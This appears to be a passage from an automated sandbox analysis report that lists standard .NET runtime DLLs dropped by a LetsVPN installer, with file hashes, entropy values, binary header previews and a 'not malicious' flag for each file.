                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20000
                                                                                                                                                                                                  Entropy (8bit):6.794822093017821
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:A09bOAghbsDCyVnVc3p/i2fBVlAO/BRU+psbC984vmJHrE1dtx66aI2sU52RWVs8:ZOAghbsDCyVnVc3p/i2fBVlAO/BRU+pC
                                                                                                                                                                                                  MD5:317087D59DC1AA7C2F85D251BA44FDE0
                                                                                                                                                                                                  SHA1:C68481D9CADB05F85BBC83759CFA0C4CE0EC3ADA
                                                                                                                                                                                                  SHA-256:F0AAACDBF06DC2075B5B55EF652632FB4EE2D247E504AE49BF8846AC00D9F49E
                                                                                                                                                                                                  SHA-512:4F2D76505B2C88CD979B3F75378E38403E6726CA0746F2AF61E339D68C7B929FAEEACF39474D4EA207E65AF9B447DA0B46FAD88EB81E2896B4AA4647F0352C6D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............r5... ...@....... ....................................@................................. 5..O....@..P............ .. ....`.......3............................................... ............... ..H............text...x.... ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B................T5......H.......P ......................h3......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3................................r.....................e...........4.................3.....L...................................R...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Numerics.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.941755352854446
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:A7W6RWVhqWOHlLf2KQcvBZ9w2S+ShjmM6IGBkSC:A5Qq3b2KZBZPS+ST6nkR
                                                                                                                                                                                                  MD5:1E176549D8AB37CFB2177838FBBFD694
                                                                                                                                                                                                  SHA1:E561378ABC1F3C58AEC49BA4F180C188AD26CACE
                                                                                                                                                                                                  SHA-256:2390DA3A0A8319FB8C40DC9882950D6A39C2DBA9FA6FD60FC7F1CAB9E2062C7D
                                                                                                                                                                                                  SHA-512:79AD35289C20A0B450856DE79A9B8880365144872423F9F8F3BAD9E41BA11DF0EB5E9297EFD7B7F95419D1541C3FB6E3EAEEB39BAE3B5F08DB3938D41C6B838B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ....................................@.................................T(..O....@.................. ....`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l.......#~......4...#Strings....(.......#US.,.......#GUID...<.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Formatters.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.020454355357436
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:SI5HeWFwTBsWZhqWOHlLf2KQcvBZ9nZbGNS+ShjmM6IGBkSG:SI5HFwTB5q3b2KZBZ7b6S+ST6nk9
                                                                                                                                                                                                  MD5:7CD6028BB33B9DBD396FD16F63BB286F
                                                                                                                                                                                                  SHA1:67F369E89650EA38D67EFE92BC030A1571742B3E
                                                                                                                                                                                                  SHA-256:C5729B2A7ACD4E422C0477D33109F160DC2460A1E7C8ACEC8DE74CEA8FC626EA
                                                                                                                                                                                                  SHA-512:1E3B6C031A8C6FA7287B72884FCD04CBF900E2B9E5CA169EB1C4FA2A3768A4A16F36203919A27F7F598680528BC994F3ED1774F695C8841E004D1679C09C146C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ....................................@.................................|)..O....@.................. ....`......D(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P ..t....................'......................................BSJB............v4.0.30319......l.......#~..H.......#Strings....@.......#US.D.......#GUID...T... ...#Blob......................3............................................................U.x...........................~.....4.....M.................h.....$...................r.....r.....r...).r...1.r...9.r...A.r...I.r...Q.r...Y.r...a.r...i.r...q.r.......................#.....+.....3.....;.)...C.D...K.d...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Json.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.990509022722697
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:rAJpVWbfkBnWUhqWOHlLf2KQcvBZ9N3rUdS+ShjmM6IGBkS7Dub:rAJpWfkBFq3b2KZBZL4dS+ST6nkYm
                                                                                                                                                                                                  MD5:462D114ADD9F6759004A49340C7721F0
                                                                                                                                                                                                  SHA1:719E5912B3B628C885D94708749EB7D3C4154211
                                                                                                                                                                                                  SHA-256:BB23D792673D6AA61AC4C38DEF659625903E6B9CB3952B782D7AFF11EDA6F811
                                                                                                                                                                                                  SHA-512:3F759B32181C142C9E9C35F5768C635D1ADE6300A3C32FA5D3D4071FE55B0AF5A61195580C90182D87812212FB7BB89180868DE7D42AC492A8396ED28F88A7EA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............>)... ...@....... ...................................@..................................(..O....@..`............... ....`.......'............................................... ............... ..H............text...D.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................ )......H.......P ......................4'......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3......................................z...........@...\.@...0.-...`.....D.................C.................[.....x.....-.........................'.....'.....'...).'...1.'...9.'...A.'...I.'...Q.'...Y.'...a.'...i.'...q.'.......................#.....+.....3.....;.#...C.>...K.^...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Primitives.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22560
                                                                                                                                                                                                  Entropy (8bit):6.6557613974263905
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Q8R71h7yzt94dHWFgQBVWeHWFyTBVWvhqWOHlLf2KQcvBZ96Nm1iS+ShjmM6IGBK:R1dyAqgQBfqyTByq3b2KZBZoAgS+ST6K
                                                                                                                                                                                                  MD5:E8C9792083B8F193EC43C3CEA6FB581E
                                                                                                                                                                                                  SHA1:B5EA61F6AEA7525652B3D998680721F2B2CAA1C0
                                                                                                                                                                                                  SHA-256:B9D8D6A7796FBD9AA4D99D21C43B317325E14647CE8CA03A211326094F8F0AE8
                                                                                                                                                                                                  SHA-512:8083B3A1082D7BBA28D0A5F91C1425CE7D60F25DAA6A4752ED75BCBE2A7546502E6A974656737AD82AFACD1F3CB79215EB5DE663910634BD856779497417C701
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............8... ...@....... ..............................aB....@..................................8..O....@..8............*.. ....`.......7............................................... ............... ..H............text........ ...................... ..`.rsrc...8....@......................@..@.reloc.......`.......(..............@..B.................8......H.......|!..l............1..p...X7......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*......(....*..BSJB............v4.0.30319......l.......#~..h.......#Strings....\...4...#US.........#GUID...........#Blob...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Xml.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20512
                                                                                                                                                                                                  Entropy (8bit):6.793591248884187
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:1psBljcZQIVI8CNwbcyMWs4oBOW9MWG4tBOW2hqWOHlLf2KQcvBZ9T+ujS+Shjmy:zsPMQMI8COYyi4oBNw4tByq3b2KZBZJ4
                                                                                                                                                                                                  MD5:F4DD591DD75552218041D7EBEF66A71D
                                                                                                                                                                                                  SHA1:B255B7C96C17360E588A8015624C0FF412E70C87
                                                                                                                                                                                                  SHA-256:777427A4657CB26C393E51794B549729DDDCA90B44B0DC3922826EC162DE55DF
                                                                                                                                                                                                  SHA-512:3BDB1B18A267C79DC5971A87D59DCE6E5B6DAA4B3B0C29F7BA75C05E744C82B0884F2CFF5771E58FCDFC1E7B74CA5B1C4A71D296039BB18503EF7FB969D660F2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............3... ...@....... ....................................@..................................3..O....@...............".. ....`.......2............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................3......H........!..0...................L2.......................................s....*..s....*..0...........o....u......,..o....*.*.0..%........s..........(....r...p.$o......o....*:.(......}....*..{....*.(....z.(....z6.{.....o....*:.{......o....*.(....z:.{......o....*.(....z.(....z.BSJB............v4.0.30319......l.......#~.. .......#Strings....$...0...#US.T.......#GUID...d.......#Blob...........W..........3............................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25120
                                                                                                                                                                                                  Entropy (8bit):6.445252190247148
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:MbhigwLAuZtM66g/Id7WVXWOhqWOHlLf2KQcvBZ9uoS+ShjmM6IGBkS2:MbhzkKsfq3b2KZBZjS+ST6nkV
                                                                                                                                                                                                  MD5:3C8BB7E74003ADB157ED9DE3AEFDDA22
                                                                                                                                                                                                  SHA1:361D696A22BD3213EF0890618374B9258248001D
                                                                                                                                                                                                  SHA-256:105B44C610BA66582F8424FADABED94E3F1C75B5406D08FDFB949AFAF37ED9D6
                                                                                                                                                                                                  SHA-512:94531ADDEA34271A39AE2BC9FA73A8AEF518F84D884F4335AA2EC03E8EE7974556769E7E83E13B14F0B8FBEDFD7935C38CCB249C55EC6A588C8EB947F1A761B8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..*.........."H... ...`....... ..............................kA....@..................................G..O....`...............4.. ............F............................................... ............... ..H............text...((... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B.................H......H.......P ...%...................F......................................BSJB............v4.0.30319......l.......#~..........#Strings.....#......#US..#......#GUID....#......#Blob......................3................................................_.........................8.....8...*.8.....8.....8.....8.....8.....8.........*.8.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.+...K.K...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.AccessControl.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):38432
                                                                                                                                                                                                  Entropy (8bit):6.157953366104177
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:AlM7Ke5/WBkyN1hCq3b2KZBZaS+ST6nkm:AlM7KuulLN3qKk/mA
                                                                                                                                                                                                  MD5:59A2081C8387D01F9E9B25D45F5E3912
                                                                                                                                                                                                  SHA1:C829687DC9236D0B311B08565D28A2D0B9B3DA94
                                                                                                                                                                                                  SHA-256:382FFAA544AC83787AB00D63B987C2B97D12A22DD3791D38059312634FB45F4B
                                                                                                                                                                                                  SHA-512:69F06C088E4318FCDE9C164E598AB1B2172546257256F12A50D7C03EE8CEEDA8FCC930FD395E196B1F8AC17171925129A0E7F52E20138A4D92536A6FB0A30E30
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..Z...........x... ........... ...............................V....`..................................x..O....................h.. ............w..T............................................ ............... ..H............text....X... ...Z.................. ..`.rsrc................\..............@..@.reloc...............f..............@..B.................x......H........%..p5..........P[.......w.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Claims.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.971970551537452
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:fUcX6W9aWHhqWOHlLf2KQcvBZ9/ctcS+ShjmM6IGBkSg:fUchNq3b2KZBZy6S+ST6nkH
                                                                                                                                                                                                  MD5:7F432B8CB1B9666E95B618CE152112ED
                                                                                                                                                                                                  SHA1:27E679D4F2C59C1ADEB47DBA513A9CAD4CDB4EBC
                                                                                                                                                                                                  SHA-256:61E8A2E9A723EE9F11E5EB31C1B6C34E74EC62CB31DDB2A6CC61EB3B356D3073
                                                                                                                                                                                                  SHA-512:ECE55941FAE54A0A4D9EA66A79CB420FF193C4B4158F46FC0E3B281277F007F2F983D20D975977BD26C636CD3DC654907CCA0F9894CFE5D4199C33840B75BC8A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............B)... ...@....... ....................................@..................................(..O....@.................. ....`.......'............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$)......H.......P ......................8'......................................BSJB............v4.0.30319......l.......#~..<.......#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0.....(.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Algorithms.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):42528
                                                                                                                                                                                                  Entropy (8bit):6.052173413564498
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:doBj7kS+8mjvHTeaWKs0Sd4eeVq3b2KZBZPLj0S+ST6nk/:APmb9WKs0Peew3qKO/mp
                                                                                                                                                                                                  MD5:347B1F63D4419C5C8C4C6555E925EB18
                                                                                                                                                                                                  SHA1:1523D3060F7D91E1A6227B0C4D02375B9E80CC14
                                                                                                                                                                                                  SHA-256:DC4A3D2211B84690BDCF1FDCF4A82DD08F0E2168BF7715E2AD3B200442C9C77C
                                                                                                                                                                                                  SHA-512:43369FAA4E1BA0C84BC3D0445BEA4AB9B0CC435E84E836DE826348434772BE83674FB30AB96DFB42180FF23381772A219CB688F01256339FF61FC74B49738C55
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..h.............. ........... ....................................@.................................u...O.......8............x.. ............................................................ ............... ..H............text....f... ...h.................. ..`.rsrc...8............j..............@..@.reloc...............v..............@..B........................H.......P'..\8..........._...%..,.......................................j~....%-.&(F...s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2rI..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2r9..p.(....*2rm..p.(....*2r...p.(....*2r...p.(....*2r=..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Cng.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21536
                                                                                                                                                                                                  Entropy (8bit):6.7932969552567215
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:MldtuO/q3p4YN5XYwWCfWxahqWOHlLf2KQcvBZ9uWKdS+ShjmM6IGBkSM:MlJSZBXY4I+q3b2KZBZH2S+ST6nkD
                                                                                                                                                                                                  MD5:2893F2AF6EE2C60B3F531B4956BF170F
                                                                                                                                                                                                  SHA1:43F0672691EAE2A6D986E4280F7635D0BBE396F0
                                                                                                                                                                                                  SHA-256:9658DD8AFFCF9017C1F290C3E484EAD20A4EAE85DDB3FFAA8F718C6189D18F31
                                                                                                                                                                                                  SHA-512:EF257A6B647405CD2675C1513E64AC5E537D8ACA4C9C9910476F730DA8839CD177A50B7A4575331BFF9E68A10DC77132800430011F5DFAD9FFF7CCE8E55825FE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...q............." ..0.............j:... ...@....... ....................................`..................................:..O....@...............&.. ....`.......9..T............................................ ............... ..H............text...p.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B................L:......H.......|!..............t6.. ....8......................................:.(......}....*..{....*"..(....*"..(....*"..(....*..(....*..(....*..(....*..(....*:.(......}....*..{....*:.(......}....*..{....*:.(......}....*..{....*..(....*:.(......}....*..{....*^.(...........%...}....*:.(......}....*..{....*z.(......}...........%...}....*V.(......}......}....*..{....*..{....*..BSJB............v4.0.30319......l.......#~..@.......#Strings....T.......#US.X.......#GUID...h.......#Blob...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Csp.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.998855723947473
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:LTI2pWPzW+hqWOHlLf2KQcvBZ9dfaxGS+ShjmM6IGBkSOu:LE33q3b2KZBZaxGS+ST6nkRu
                                                                                                                                                                                                  MD5:1EA2C6268DE97149C3B6F120A6E52B83
                                                                                                                                                                                                  SHA1:6438DA3D482FE874ADEC765AA9624A540D5DB686
                                                                                                                                                                                                  SHA-256:A240D7B8C60B82A75F54E418FFABED591A35282D09CEFAF4DEC3AE5264D9F71F
                                                                                                                                                                                                  SHA-512:C7C6DDD2E225249DF5A4E8D6A99857E5402E5526BEE9FCF35A18D6A430BFCEC280570BFDB5D3CAC1E53EC35A6B64CD3965F948AC01347077007B4177F666CA38
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............^)... ...@....... ...............................T....@..................................)..O....@..`............... ....`.......'............................................... ............... ..H............text...d.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................@)......H.......P ......................T'......................................BSJB............v4.0.30319......l.......#~..,.......#Strings............#US.........#GUID...........#Blob......................3......................................z...........A...\.A...0.....a.....D.................C.................[.....x.....-.........................(.....(.....(...).(...1.(...9.(...A.(...I.(...Q.(...Y.(...a.(...i.(...q.(.......................#.....+.....3.....;."...C.=...K.]...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Encoding.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.01043644984067
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:+cezoy4W04WOmhqWOHlLf2KQcvBZ9+LS+ShjmM6IGBkSIh:+Bzoy+jq3b2KZBZoS+ST6nkzh
                                                                                                                                                                                                  MD5:9D3DD05A7105339169ADDE890C88AC83
                                                                                                                                                                                                  SHA1:9F6BD6BFA1ED1D82F96EC1F418880F2662E9DC7D
                                                                                                                                                                                                  SHA-256:ACA4ED3642A63D01A20C168BF8ED9F6CC08B6385D5219C5948BBB60B75C7DB2F
                                                                                                                                                                                                  SHA-512:DF88BA3D85F09D7DE7212707C1E3F3916794F76312061C69AEA4F14C3DED36525A6824A4AAFD6CCECE737860921B8D7F29286D445AA749B3D8331D3ECE217D93
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............~)... ...@....... ....................................@.................................,)..O....@.................. ....`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`)......H.......P ..$...................t'......................................BSJB............v4.0.30319......l.......#~..<.......#Strings............#US.........#GUID....... ...#Blob......................3..................................................f...o.f...C.S.........W.................V...........%.....n...........@.....)...................M.....M.....M...).M...1.M...9.M...A.M...I.M...Q.M...Y.M...a.M...i.M...q.M.......................#.....+.....3.....;.'...C.B...K.b...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Pkcs.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22560
                                                                                                                                                                                                  Entropy (8bit):6.76183219276718
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:HyBGXZp94Yi06W82W8hqWOHlLf2KQcvBZ9VI3UZS+ShjmM6IGBkSQD:emZp9ZwMq3b2KZBZ8aS+ST6nkv
                                                                                                                                                                                                  MD5:68B46F5451304425F315AFF4154D34C6
                                                                                                                                                                                                  SHA1:E1C2B91BC255A40BD4116EDB17BF967014D4648A
                                                                                                                                                                                                  SHA-256:70CC659047E6231809038FD239AA3C04748959DE3970515D7E32469F8CC9B136
                                                                                                                                                                                                  SHA-512:67927FE36F3286AD517990179E9F107F0EC8CE26D66BD2ADF0B712FA01D30C69EA7DAE67E8E660B3381825939E5155297E668577F2282429EBCDB6163D755D7D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....J..........." ..0.............Z=... ...@....... ..............................!.....`..................................=..O....@..X............*.. ....`.......<..T............................................ ............... ..H............text...`.... ...................... ..`.rsrc...X....@....... ..............@..@.reloc.......`.......(..............@..B................;=......H........!..............d9.. ....;......................................:.(......}....*..{....*"..(....*"..(....*"..(....*"..(....*"..(....*..(....*..(....*..(....*..(....*:.(......}....*..{....*:.(......}....*..{....*:.(......}....*..{....*..(....*:.(......}....*..{....*^.(...........%...}....*:.(......}....*..{....*z.(......}...........%...}....*V.(......}......}....*..{....*..{....*BSJB............v4.0.30319......l...h...#~......0...#Strings............#US.........#GUID...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Primitives.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.912984335281838
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:1H/JWKpWphqWOHlLf2KQcvBZ95NS+ShjmM6IGBkSY:1H/jEq3b2KZBZBS+ST6nkv
                                                                                                                                                                                                  MD5:BF8033D65A2C318D533909CAA8EB3270
                                                                                                                                                                                                  SHA1:A1367CCEA0575FC7E6AED5892389359F222AC358
                                                                                                                                                                                                  SHA-256:FDC059C9E4746A88925168F89011C30BC1FE4F36A8B2039AD94042ED9DA5F5D7
                                                                                                                                                                                                  SHA-512:12FC27E9BC76245972F599264549126D8A7692EC1C1F72ACFB3C6596D9A90981DE04C1446CBA3E5DB4F7855E2AF0A6915C6CE42822284BC67EE1F807AC6475E6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0............."*... ...@....... ...............................`....@..................................)..O....@.................. ....`.......(............................................... ............... ..H............text...(.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l...$...#~..........#Strings............#US.........#GUID....... ...#Blob......................3............................................................o.s...........D.....D.....D.....D...8.D...Q.D.....D.....D...l.....U.D.................m.....m.....m...).m...1.m...9.m...A.m...I.m...Q.m...Y.m...a.m...i.m...q.m.......................#.....+.....3.....;.)...C.D...K.d...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.ProtectedData.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21536
                                                                                                                                                                                                  Entropy (8bit):6.828657815336929
                                                                                                                                                                                                  Encrypted:false
